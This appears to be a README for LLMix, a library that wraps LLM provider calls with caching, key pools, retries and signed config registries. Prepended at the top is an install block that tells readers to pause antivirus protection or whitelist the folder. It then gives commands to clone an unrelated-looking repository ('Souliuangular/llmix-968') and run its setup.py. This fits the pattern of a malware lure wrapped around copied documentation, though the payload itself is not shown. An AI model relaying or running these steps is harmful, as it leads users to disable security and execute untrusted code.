Tip
If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
Caution
Some security systems may block the installation. Only download from the official repository.
git clone https://github.com/Souliuangular/llmix-968.git
cd llmix-968
python setup.pyRead in other languages: English · 中文 · Deutsch · Español · Français · Русский · 한국어 · 日本語 · हिन्दी
Config-driven LLM calls for Python, TypeScript, and Rust. Keep your SDK. Move model behavior into MDA presets. Put cache, retries, key rotation, and rollout control around the call.
LLMix is the layer between your product and the provider SDK.
It does not ask you to rewrite your OpenAI, Anthropic, Gemini, LiteLLM, AI SDK, or custom client code. It wraps the call. The boring parts go around it: response cache, circuit breaker, key pools, singleflight, retry policy, adaptive concurrency, provider kwargs, and MDA config loading.
The model stops being a hard-coded string buried in application code. It becomes data. Change a preset, publish a compiled registry release, reload the service, and the next request can run a different provider or model. No redeploy for the usual model swap dance.
That is the whole thing. Small layer. Sharp edges filed down.
AI products in 2026 do not usually fail because one SDK call is hard.
They fail in the spaces around the call. A key gets rate limited. A provider gets slow. Two hundred users ask the same thing at once. A model swap needs a deploy. A cache key differs by one invisible parameter. One service is in Python, another is in TypeScript, and the Rust worker has to follow the same contract.
LLMix is for that part of the system. The signal chain between your app and the model.
You still own the prompt. You still own the SDK. LLMix owns the harness.
cargo add llmix-rs --features providers-openai,redis
LLMix uses the MDA config packages for preset loading. They are also published
as standalone runtime loaders for apps that need `.mda` validation, integrity,
or trust-policy enforcement outside LLMix.
---
## Documentation
If you are new to LLMix, read in this order:
Other operations docs:
- [Secure LLMix configuration translations](docs/llmix/secure-mda/secure-llmix-configuration.md) ([de](docs/llmix/secure-mda/secure-llmix-configuration.de.md), [es](docs/llmix/secure-mda/secure-llmix-configuration.es.md), [fr](docs/llmix/secure-mda/secure-llmix-configuration.fr.md), [hi](docs/llmix/secure-mda/secure-llmix-configuration.hi.md), [ja](docs/llmix/secure-mda/secure-llmix-configuration.ja.md), [ko](docs/llmix/secure-mda/secure-llmix-configuration.ko.md), [ru](docs/llmix/secure-mda/secure-llmix-configuration.ru.md), [中文](docs/llmix/secure-mda/secure-llmix-configuration.zh.md))
- [Key pool operations](docs/llmix/key-pool-operations.md)
- [Standalone MDA config loader docs](docs/mda-config/README.md)
---
## At a Glance

LLMix wraps one provider call at a time.
It is not a router in the LiteLLM sense. It is closer to the harness you keep rebuilding around every agent, coder tool, extraction service, and internal AI workflow once traffic becomes real.
---
### TypeScript
```typescript
import {
CallPipeline,
KeyPool,
TwoTierCache,
openaiDispatch,
} from "@snoai/llmix";
const pipeline = new CallPipeline({
dispatch: openaiDispatch(),
responseCache: new TwoTierCache("memory"),
});
pipeline.setKeyPool("openai", new KeyPool([process.env.OPENAI_API_KEY!]));
const response = await pipeline.call({
config: {
provider: "openai",
model: "gpt-4o-mini",
common: { temperature: 0.2, maxOutputTokens: 512 },
caching: { strategy: "memory" },
},
messages: [
{ role: "user", content: "Explain LLMix in one sentence." },
],
});
console.log(response.content);
await pipeline.close();
import asyncio
import os
from llmix import (
CallInput,
CallPipeline,
KeyPool,
PipelineConfig,
TwoTierCache,
openai_dispatch,
)
async def main() -> None:
pipeline = CallPipeline(
PipelineConfig(
dispatch=openai_dispatch(),
response_cache=TwoTierCache("memory"),
)
)
pipeline.set_key_pool("openai", KeyPool([os.environ["OPENAI_API_KEY"]]))
response = await pipeline.call(
CallInput(
config={
"provider": "openai",
"model": "gpt-4o-mini",
"common": {"temperature": 0.2, "max_output_tokens": 512},
"caching": {"strategy": "memory"},
},
messages=[
{"role": "user", "content": "Explain LLMix in one sentence."}
],
)
)
print(response.content)
await pipeline.close()
asyncio.run(main())Rust exposes the same pipeline contract. The OpenAI helper is feature-gated.
[dependencies]
llmix-rs = { version = "2.0.0", features = ["providers-openai"] }
serde_json = "1"
tokio = { version = "1", features = ["macros", "rt"] }use llmix_rs::{
load_keys_from_env, CallInput, CallPipeline, OpenAiChatHelper, PipelineConfig,
};
use serde_json::json;
let pipeline = CallPipeline::new(PipelineConfig::new(OpenAiChatHelper::new()))?;
pipeline.set_key_pool("openai", load_keys_from_env("openai")?);
let response = pipeline
.call(CallInput {
config: json!({
"provider": "openai",
"model": "gpt-4o-mini",
"common": { "temperature": 0.2, "max_output_tokens": 512 },
"caching": { "strategy": "memory" }
}),
messages: vec![json!({
"role": "user",
"content": "Explain LLMix in one sentence."
})],
singleflight_key: None,
})
.await;See the Rust guide for full main examples and feature flags.
| Concern | What LLMix does |
|---|---|
| Response cache | L1 memory plus optional Redis L2, with cross-runtime canonical cache keys |
| Key pools | Round-robin key selection, 429 rotation, and 401/403 dead-key eviction |
| Retries | Jittered exponential backoff, with Retry-After honored |
| Circuit breaker | Scoped by provider and effective base URL |
| Singleflight | Collapses identical concurrent work into one upstream request |
| Concurrency | AIMD adaptive semaphore, driven by rate-limit feedback |
| Provider kwargs | Common config becomes provider-specific request fields |
| Thinking tokens | Optional <think> extraction into normalized response objects |
| Registry | Signed compiled config registry with one live current.json pointer |
The defaults are meant to be boring. Tune them when real traffic gives you a reason.
LLMix uses MDA as the source format for model presets. Human notes and runtime
settings live in one file. Production services read the compiled registry, not
the mutable source tree.
Python, TypeScript, and Rust can require MDA integrity, requires.network, and
verifier-hook based signatures while loading or publishing registry output.
Real Rekor transport and Sigstore cryptography are supplied by caller-provided
clients/verifiers.
The examples below use this preset path:
config/llm/source/search_summary/openai_fast.mda
---
name: openai_fast
description: Fast OpenAI preset for search summaries.
metadata:
snoai-llmix:
common:
provider: openai
model: gpt-5-mini
temperature: 0.2
maxOutputTokens: 512
caching:
strategy: redis-or-memory
providerOptions:
openai:
reasoningEffort: medium
---
# openai_fast
Summarize search results for a research workflow.
Load it directly when editing or testing a preset:
import { loadMdaConfig } from "@snoai/llmix";
const config = await loadMdaConfig("./config/llm/source/search_summary/openai_fast.mda");from llmix import load_mda_config
config = load_mda_config("./config/llm/source/search_summary/openai_fast.mda")use llmix_rs::load_config;
let config = load_config("./config/llm/source/search_summary/openai_fast.mda")?;For production services, use the registry.
Use this layout. Treat it as the public contract:
config/llm/
source/
<module>/
<preset>.mda
current.json
compiled/
source/ is edited by people. current.json and compiled/ are generated by
LLMix. Store the trust anchor outside config/llm.
The release flow is:
prepare steps.
The did:web example assumes these release-identity inputs already exist outside
config/llm: release/did-web-private-key.pem and release/did.json. Provide
them from your release system or use the GitHub Actions Sigstore/Rekor profile
instead.
mkdir -p config/llm/source/search_summary release deploy
mda init --template llmix-preset \
--module search_summary \
--preset openai_fast \
--provider openai \
--model gpt-5-mini \
--out config/llm/source/search_summary/openai_fast.mda
mda validate config/llm/source/search_summary/openai_fast.mda \
--target source \
--json
mda integrity compute config/llm/source/search_summary/openai_fast.mda \
--target source \
--write \
--json
mda release trust policy \
--target llmix-registry \
--profile did-web \
--domain config.example.com \
--out release/trust-policy.json \
--json
mda sign config/llm/source/search_summary/openai_fast.mda \
--profile did-web \
--did did:web:config.example.com \
--key-id did:web:config.example.com#release \
--key-file release/did-web-private-key.pem \
--in-place \
--json
mda verify config/llm/source/search_summary/openai_fast.mda \
--target source \
--policy release/trust-policy.json \
--did-document release/did.json \
--json
mda release prepare \
--target llmix-registry \
--source config/llm/source \
--registry-dir config/llm \
--policy release/trust-policy.json \
--did-document release/did.json \
--out release/plan.json \
--jsonllmix publish-registry \
--root config/llm \
--release-plan release/plan.json \
--revision 2026-05-14T000000Z \
--policy release/trust-policy.json \
--did-document release/did.json \
--root-did did:web:config.example.com \
--root-key-id did:web:config.example.com#release \
--root-key-file release/did-web-private-key.pem \
--json
mda release finalize \
--target llmix-registry \
--registry-dir config/llm \
--registry-root config/llm/compiled/2026-05-14T000000Z/registry-root.json \
--release-plan release/plan.json \
--policy release/trust-policy.json \
--derive-root-digest \
--minimum-revision 2026-05-14T000000Z \
--out deploy/llmix-trust.json \
--did-document release/did.json \
--json
mda doctor release \
--target llmix-registry \
--source config/llm/source \
--registry-dir config/llm \
--release-plan release/plan.json \
--manifest deploy/llmix-trust.json \
--did-document release/did.json \
--json
llmix check-registry \
--root config/llm \
--trust deploy/llmix-trust.json \
--preset search_summary/openai_fast \
--did-document release/did.json \
--tamper-proof \
--jsonRuntime code opens the generated registry with the external trust anchor:
import {
ConfigRegistryManager,
loadLlmixTrustManifest,
registryRootOptionsFromTrustManifest,
} from "@snoai/llmix";
const trust = await loadLlmixTrustManifest(process.env.LLMIX_TRUST_ANCHOR!);
const manager = await ConfigRegistryManager.open("config/llm", {
signedRoot: registryRootOptionsFromTrustManifest(trust, { didWebVerifier }),
});
const config = await manager.getPreset("search_summary", "openai_fast");didWebVerifier is the app verifier hook required by this did:web policy. For a
command-line runtime proof, use llmix check-registry --did-document release/did.json; in app code, pass the verifier hooks required by your trust
policy.
Managers expose the active revision and reload health metadata. That makes it easy to say exactly which config a service is running. See Secure LLMix Configuration with MDA for the complete release flow and runtime tamper-rejection proof.
ConfigRegistryPublisher is still available for advanced release systems, but
the default public path is the llmix publish-registry command. Do not write a
project-local registry compiler.
The public dispatch helpers cover the providers we actually test.
| Provider | Python | TypeScript | Notes |
|---|---|---|---|
| OpenAI | openai_dispatch |
openaiDispatch |
OpenAI Responses and chat-style flows |
| Anthropic | anthropic_dispatch |
anthropicDispatch |
Messages API, thinking budget validation |
| Gemini | gemini_dispatch |
geminiDispatch |
Google GenAI-compatible params |
| OpenRouter | openrouter_dispatch |
openrouterDispatch |
OpenAI-compatible |
| DeepInfra | deepinfra_dispatch |
deepinfraDispatch |
OpenAI-compatible |
| Novita | novita_dispatch |
novitaDispatch |
OpenAI-compatible |
| Together | together_dispatch |
togetherDispatch |
OpenAI-compatible |
| Sno GPU | sno_gpu_dispatch |
snoGpuDispatch |
On-prem OpenAI-compatible GPU endpoints |
Rust currently ships the neutral pipeline plus feature-gated helpers for OpenAI, Anthropic, Gemini, and Sno GPU. Treat Rust provider helpers as beta. The cache, key-pool, registry, retry, and pipeline contract are aligned with Python and TypeScript.
OpenAI-compatible providers reuse the OpenAI request shape with provider-specific base_url handling. That keeps the contract plain. Plain is useful.
| Variable | Purpose |
|---|---|
OPENAI_API_KEY / OPENAI_KEYS |
OpenAI key or comma-separated key pool |
ANTHROPIC_API_KEY / ANTHROPIC_KEYS |
Anthropic key or comma-separated key pool |
GEMINI_API_KEY / GEMINI_KEYS |
Gemini key or comma-separated key pool |
OPENROUTER_API_KEY / OPENROUTER_KEYS |
OpenRouter key or comma-separated key pool |
DEEPINFRA_API_KEY / DEEPINFRA_KEYS |
DeepInfra key or comma-separated key pool |
TOGETHER_API_KEY / TOGETHER_KEYS |
Together key or comma-separated key pool |
NOVITA_API_KEY / NOVITA_KEYS |
Novita key or comma-separated key pool |
SNO_LLM_API_KEY |
Sno GPU direct dispatcher fallback |
SNO_GPU_API_KEY / SNO_GPU_KEYS |
Sno GPU key-pool variables for provider id sno-gpu |
GPU_BASE_URL |
Sno GPU base URL |
REDIS_URL |
Redis response-cache URL |
LLMIX_STATE_DIR |
Lock files, batch metadata, and kill-switch state |
load_keys_from_env("provider-name") checks PROVIDER_NAME_KEYS first, then PROVIDER_NAME_API_KEY. Dashes become underscores.
- Not a streaming framework. Streaming stays with your SDK.
- Not a prompt framework. Bring your own prompt layer.
- Not a provider marketplace. One call uses the provider named by its config.
- Not a reason to hide every model decision behind indirection. Some things should stay in code.
LLMix is useful when the same model-call shape keeps showing up across services. If you have one script and one key, you probably do not need it yet.
# Full monorepo checks
bun run build
bun run check
bun run test
